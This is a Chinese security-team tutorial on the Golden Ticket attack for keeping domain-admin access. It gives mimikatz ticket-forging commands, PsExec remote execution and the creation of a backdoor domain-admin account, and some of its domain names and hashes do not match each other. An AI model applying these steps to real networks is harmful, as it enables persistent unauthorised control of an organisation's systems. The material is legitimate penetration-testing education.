暂无图片
暂无图片
暂无图片
暂无图片
暂无图片

域渗透|域权限维持之黄金票据

灼剑安全团队 2021-08-31
1991

点击上方蓝字关注我们


0x00 前言

⻩⾦票据⽣成攻击,是⽣成有效的TGT Kerberos票据,并且不受TGT⽣命周期的影响(TGT默认10⼩时,最多续订7天),这⾥可以为任意⽤户⽣成⻩⾦票据,然后为域管理员⽣成TGT,这样普通⽤户就可以变成域管理员。


Krbtgt:密钥分发管理中心


方法:

1、已经拿下域管理员,获取到hash;

2、利用krbtgt的hash制作黄金票据工具,进行攻击。


0x01 前置条件

1、域名:icq.com

2、域的SID值:

>whoami user

>whoami all

>wmic useraccount get name,sid

3、域的KRBTGT账户NTLM-HASH:d71bbd0d44149c752d5a6e49b17ed08e

4、伪造用户名:test(任意用户名)


0x02 本地测试


1、获取域控的名称

net time


2、获取域的sid

whoami user

S-1-5-21-676000920-1652552181-3322320025


3、获取krbtgt的NTLM hash

利用卷影拷贝方法获取域内所有HASH,此阶段后续详细总结。953eb0591ac152c17edfa514021c47f6


4、使用mimikatz伪造票据:

kerberos::golden user:test domain:god.com sid:S-1-5-21-676000920-1652552181-3322320025 krbtgt:953eb0591ac152c17edfa514021c47f6 ticket:g


5、导入票据(kerberos::ptt g)

参数说明:

kerberos::list //查看本地保存的票据,观察client name  

kerberos::purge //清理本地票据缓存

kerberos::ptt [票据名] //导入伪造的黄金票据

cmd下查看 klist //查看票据

* 注意:票据20分钟内有效,过期之后可以再次导入


生成票据+导入一步到位:

mimikatz.exe "kerberos::golden /user:test /domain:god.com /sid:S-1-5-21-676000920-1652552181-3322320025

/krbtgt:953eb0591ac152c17edfa514021c47f6 /ptt" exit


6、访问DC目录


7、执行命令

PsExec.exe \\win-2008dc.god.com cmd.exe


8、创建一个新的用户并添加到域管理员组:


net user  who 123.com /add /domain

net group “domain admins” who /add /domain


0x03 总结

该攻击⽅式其实是⼀种后⻔的形式,属于第⼆次进⾏攻击的⽅法。

第⼀次拿到域管权限之后,需要将krbtgt NTLM hash进⾏保存,当第⼆次再来进⾏域渗透攻击时,我们就可以使⽤该krbtgt的NTLM hash制作⻩⾦票据,从⽽再次获得域管理员权限。


往期文章:

        域渗透|域权限维持之SSP

        域渗透|域权限维持之DSRM

        域渗透|域权限维持之SID History

        域渗透|域权限维持之Skeleton Key

        域渗透|域权限维持之白银票据


☆ END ☆

长按关注

灼剑(Tsojan)安全团队



点个在看你最好看


文章转载自灼剑安全团队,如果涉嫌侵权,请发送邮件至:contact@modb.pro进行举报,并提供相关证据,一经查实,墨天轮将立刻删除相关内容。

评论